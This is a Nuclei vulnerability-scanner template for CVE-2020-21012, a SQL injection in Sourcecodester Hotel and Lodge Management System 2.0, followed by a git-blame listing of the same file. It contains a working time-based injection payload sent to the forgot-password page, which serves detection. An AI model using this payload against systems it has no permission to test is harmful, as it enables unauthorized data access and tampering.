nuclei-templates/cves/2020/CVE-2020-21012.yaml

id: CVE-2020-21012

info:
  name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
  author: edoardottt
  severity: critical
  description: |
    Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/hitIer/web_test/tree/master/hotel
    - https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-21012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-21012
    cwe-id: CWE-89
  metadata:
    verified: "true"
  tags: cve,cve2020,hotel,sqli,unauth

requests:
  - raw:
      - |
        POST /forgot_password.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        btn_forgot=1&email=1%27%20or%20sleep(6)%23

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "Hotel Booking System")'
        condition: and

# Enhanced by md on 2022/12/08
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00			`id: CVE-2020-21012`

			`info:`
			`name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection`
			`author: edoardottt`
			`severity: critical`
			`description: \|`
Dashboard Content Enhancements (#6308) Dashboard Content Enhancements 2022-12-09 21:40:18 +00:00			`Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.`
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00			`reference:`
			`- https://github.com/hitIer/web_test/tree/master/hotel`
Update CVE-2020-21012.yaml 2022-11-15 11:15:00 +00:00			`- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html`
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-21012`
			`classification:`
Auto Generated CVE annotations [Wed Nov 16 09:38:10 UTC 2022] :robot: 2022-11-16 09:38:10 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00			`cve-id: CVE-2020-21012`
Auto Generated CVE annotations [Wed Nov 16 09:38:10 UTC 2022] :robot: 2022-11-16 09:38:10 +00:00			`cwe-id: CWE-89`
Update CVE-2020-21012.yaml 2022-11-15 11:15:00 +00:00			`metadata:`
Auto Generated CVE annotations [Wed Nov 16 09:38:10 UTC 2022] :robot: 2022-11-16 09:38:10 +00:00			`verified: "true"`
Update CVE-2020-21012.yaml 2022-11-16 08:36:26 +00:00			`tags: cve,cve2020,hotel,sqli,unauth`
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /forgot_password.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

Update CVE-2020-21012.yaml 2022-11-15 11:15:00 +00:00			`btn_forgot=1&email=1%27%20or%20sleep(6)%23`
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00
			`matchers:`
			`- type: dsl`
			`dsl:`
Update CVE-2020-21012.yaml 2022-11-15 11:15:00 +00:00			`- 'duration>=6'`
			`- 'status_code == 200'`
			`- 'contains(body, "Hotel Booking System")'`
			`condition: and`
Dashboard Content Enhancements (#6308) Dashboard Content Enhancements 2022-12-09 21:40:18 +00:00
			`# Enhanced by md on 2022/12/08`